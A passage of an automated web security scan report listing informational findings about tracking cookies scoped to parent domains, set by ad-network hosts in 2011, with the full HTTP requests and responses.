Content-Length: 43
Date: Mon, 09 May 2011 13:59:45 GMT

GIF89a.............!.......,...........D..;

9.69. http://pix04.revsci.net/I10982/b3/0/3/1003161/448768738.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /I10982/b3/0/3/1003161/448768738.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I10982/b3/0/3/1003161/448768738.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.nme.com%252Fnews%252Fsufjan-stevens%252F56527%253F_rsiL%253D0%26DM_EOM%3D1&C=I10982 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_Wdkl=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; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; 
udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzBVeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==; rsiPus_--QM="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"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Wdkl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 14:01:00 GMT; Path=/
Set-Cookie: NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd9c&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 14:01:00 GMT; Path=/
Set-Cookie: rtc_7_f3=MLvn9yUVZjpnpsoVwxtUaAgBXM1ocLKpZkLem1XJimjUNmWkLuW+Q3IYAcHCWGbufeXNaSBtbG5g5lLo7eYML1bRrFjZ8GZkY1DoUVQ3JAFkNwLoqysQx52jEC2lMqa7ifpThxs7FyNvveFNtEn7NSMcJ2SH/j03Jmzm6B9e1KoIieaD6fQiz+SI37JiXn8z7XtHZMFtt272+/QzRcdgnWOdJNCjqAIeNphuktNAVr/HDP/YSOQy3kkr4NUHjvkkUrhr7WbzSfqA1MvgxrBz9iRzXradVJPn0fdOzB0+msOFqupVxy37ALlnnzDoASz2U1OcgEgeG+WV8hzBhWSJXDBRzrKIOwxeaBOhkrCzhdMeGy4zG0FAj/O7/Tu0HXAgyamecYsUt5hoqKvSCuPG66sWNIjOQ09Az4HEmltEiHlQr42e0xSoaGP6pj6u/ug4j6qm9remPZasxkhCsw9rRJ9xzsLQ16/+c7iYQzwO2wI1sFxOFTgcF0rJsrH2RLNC8zcxLWr7KlfpB4ZLpKqqojzY0pJoe6N7Jt9YwmtLLrOAizP57gse9Rf8AI2yMPD3HMDiws58WpQgTmSfCd5s849ALAy0/kJyEC7kKGH5i0xoELx4cqoVQ8sGsuzfEJVNiA2FBxgVaPTkScHKYeuHIbKaLzFeQMqiZqzQCKL2DYQJxKRmfoP6lY/yoowlXy8dWrI2rGMXIzCo4oWBDSOxiHHqc1vo5g0W/Z9+g6YgWZoZ4G8ilolPjmfRgn7f2YPFdUVTixjywHsRBmqnWfr/PD9ehQ8B+t6OIuhGnnKgcA/iX6iaRaDg63Eq9HTcrRpXFVmwrz7VSWUX4sbZYJs7DNbc8J/t7+QY4D/RX/xrzQUR2W1Tn07RWTUTmlXISziIN5UNDQ9c03yJaRCnjVmHY9hAmW6dpVqXeUwbjGOVxwmecpOnbSpTq5xE0CRdxnHf4QStwrBwr/FKMd+a/dBlwEolGm1HvaEG0pICWzDZ2hVeeNJuEhwOZNshSeEUgaPJ879t2sA4qw5UV0j+Uc/IMRHzohx8g8WAIRJTsBuIxSKmpu+dZF8fZTeKv9bgD6eb+qxB4yKhRhen4I/qhGIj1Oci6tXfQjOUl3SzFg8Py4Oa/werp4xtvN1s84DdhcC0lR5fOCLS9b3G7+5aCcNnvrv/8NrCS/jTxyCHoj6vbo6mX1e4X/mjJw18iYOhaB802RsdGuNUg7D+231yHlu7JjTrvjF4++snwjnDi+CXlNxQOXbD7J5T/1z2qnvDRf7JDT4X8vtlPKY4/BdnbD+DpcAImn1g/AbomaIYfPJC6/0PndODqXMddNA6iDqg0WeIYc49DHKdW5OdtG/l11ugUI5rv3Ccbxdj9KbpB64syn6ZNpuyTMEqjmtmryNrax42/C1cTdhfnyeENrLnWHnGSGmfQNDGc4ND4vvSPvv+/1gkpHRWdiKz3v0CdKoxFR2a7pwgDt0NwqyKAwz1S9PYQv7+jHRkMmS09BnmnxT35jy6qxR+h04rxWldh5Nb9tSFd/y3nVbhUpxclD8C3Jf2jy14PUdYBrHSBwobp86iS7Sr0pfxpJ6yYBXqqFvEaacobjsgOaJG5ArH7VjPz+nb/eolY3GQXiZYXpl8rs35wPJx/m/RdY5HFaYpj97Mc+LacQ7fPn4nGXobGuPcdPKLmjpy9e3RaQwhbNH1rI5TWZ6jzhyfYG1T8PMbysEIpJnvca7MpjiwPpTLBaMGft0wmEw5hmow3P2ZAAzZmHGNZMBN; Domain=.revsci.net; Expires=Tue, 08-May-2012 14:01:00 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:01:00 GMT
Content-Length: 671

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3
...[SNIP]...

9.70. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_dGQ8=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; rsiPus_wuF1="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"; rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:43 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:42 GMT
Content-Length: 729

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_72078'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...

9.71. http://pix04.revsci.net/J06575/b3/0/3/1003161/306691632.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/306691632.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/306691632.gif?D=DM_LOC%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages%253Fzipcode%253Dundefined%2526age%253Dnull%2526gender%253Dundefined%2526_rsiL%253D0%26DM_CAT%3Dnewspaper%2520%253E%2520news%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_dGQ8=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; udm_0=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; rsiPus_xqR7="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"; rsi_us_1000000="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"; 
rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ8U7xE84mx8cR/xmi3McKUrpVsIwOgHBRuY4DkmM2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oL6zR/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkcZJg/g==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_dGQ8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mGHo=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd51&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 13:59:45 GMT; Path=/
X-Proc-ms: 13
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 13:59:44 GMT

GIF89a.............!.......,...........D..;

9.72. http://pixel.33across.com/ps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dab4fa85facd099 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1304471552277%3As2.33%3D%2C3390%2C2740%2C

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1304949937737%3As2.33%3D%2C8131%2C4401%2C2751%2C8801%2C8261%2C6571%2C3831%2C7051%2C7651%2C6561%2C7661%2C2740%2C4411%2C9221%2C7671%2C9241%2C8151%2C5481%2C571%2C6581%2C8771%2C7621%2C8291%2C8301%2C6531%2C8171%2C2231%2C8781%2C4381%2C3321%2C7101%2C8311%2C8791%2C5451%2C8181%2C4911%2C7641%2C5441%2C2811%2C3761%2C7591%2C5911%2C2801%2C4472%2C7111%2C3771%2C5431%2C7131%2C5902%2C1051%2C3202%2C5421%2C4451%2C6651%2C4461%2C5411%2C7121%2C8761%2C2791%2C5891%2C6641%2C4941%2C8101%2C8711%2C581%2C8231%2C3741%2C5941%2C7561%2C8111%2C7141%2C4441%2C1061%2C591%2C7161%2C2761%2C8241%2C6621%2C4421%2C5391%2C8721%2C4431%2C601%2C3241%2C5921%2C3721%2C8121%2C7581%2C5381%2C5021%2C3161%2C3711%2C7531%2C8391%2C8001%2C5012%2C7521%2C6111%2C5601%2C6931%2C7541%2C6091%2C6941%2C6461%2C8041%2C5591%2C6951%2C6131%2C8431%2C3193%2C5051%2C6411%2C8421%2C4501%2C5572%2C6961%2C8061%2C4492%2C6421%2C6121%2C7511%2C4481%2C5581%2C8051%2C3171%2C6431%2C2571%2C6971%2C8331%2C6501%2C5552%2C5081%2C201%2C6981%2C2141%2C8871%2C8321%2C6511%2C6991%2C7461%2C4592%2C6041%2C5071%2C7961%2C4581%2C7001%2C8881%2C8341%2C5061%2C6471%2C7011%2C6071%2C231%2C2651%2C5111%2C7971%2C6051%2C7031%2C6481%2C5512%2C7991%2C6491%2C8851%2C6331%2C7891%2C2441%2C3521%2C4071%2C2981%2C8541%2C6321%2C5221%2C9081%2C7901%2C3541%2C8512%2C2461%2C9061%2C7881%2C3551%2C6791%2C2452%2C7381%2C7921%2C4101%2C5192%2C6841%2C5731%2C7931%2C2951%2C6291%2C7391%2C9051%2C3561%2C8551%2C4051%2C6281%2C2491%2C2971%2C7361%2C5211%2C3571%2C4671%2C2481%2C3581%2C7373%2C5751%2C4061%2C2961%2C7831%2C341%2C7351%2C9011%2C8471%2C4681%2C6391%2C9021%2C2501%2C4691%2C6862%2C3071%2C5181%2C7811%2C5171%2C7821%2C3481%2C4031%2C6851%2C6371%2C7341%2C9001%2C3491%2C7861%2C5131%2C6361%2C4711%2C8501%2C7321%2C5121%2C7871%2C8991%2C3501%2C6901%2C8481%2C4721%2C7301%2C7841%2C5151%2C3511%2C5682%2C361%2C7851%2C5141%2C8971%2C5351%2C8671%2C7771%2C4751%2C2311%2C7291%2C4271%2C2851%2C5831%2C9202%2C8661%2C4741%2C951%2C6201%2C7281%2C6661%2C4281%2C2871%2C5842%2C4761%2C61
81%2C5361%2C8641%2C6191%2C7751%2C7261%2C6711%2C8701%2C5861%2C921%2C6171%2C5871%2C3911%2C5321%2C4771%2C8691%2C7251%2C5332%2C4251%2C9162%2C7791%2C6691%2C8682%2C6151%2C431%2C4791%2C6701%2C5881%2C421%2C7781%2C2841%2C9151%2C8601%2C7711%2C3881%2C3341%2C4801%2C7701%2C5771%2C7221%2C5781%2C4351%2C6721%2C9131%2C2932%2C6241%2C7691%2C8591%2C5791%2C4341%2C2941%2C5311%2C7681%2C3351%2C451%2C6733%2C9122%2C3891%2C6771%2C5251%2C3851%2C3362%2C9111%2C6232%2C5261%2C8631%2C5801%2C3841%2C7191%2C971%2C3871%2C9101%2C5811%2C7181%2C2901%2C5271%2C6211%2C7721%2C3390%2C7171%2C961%2C4311%2C6761%2C5821%2C3861%2C9091%2C; Domain=.33across.com; Expires=Tue, 08-May-2012 14:05:37 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:05:37 GMT
Connection: close
Server: 33XG1

GIF89a.............!...,...........L..;

9.73. http://pixel.invitemedia.com/data_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data_sync?partner_id=64 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; 
